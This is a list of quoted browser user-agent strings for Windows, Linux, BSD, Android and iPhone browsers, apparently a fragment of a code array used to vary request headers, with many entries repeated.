'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20',
'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2',
'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2',
'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0',
'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0)',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1',
'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5',
'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20',
'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2',
'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2',
'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0',
'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
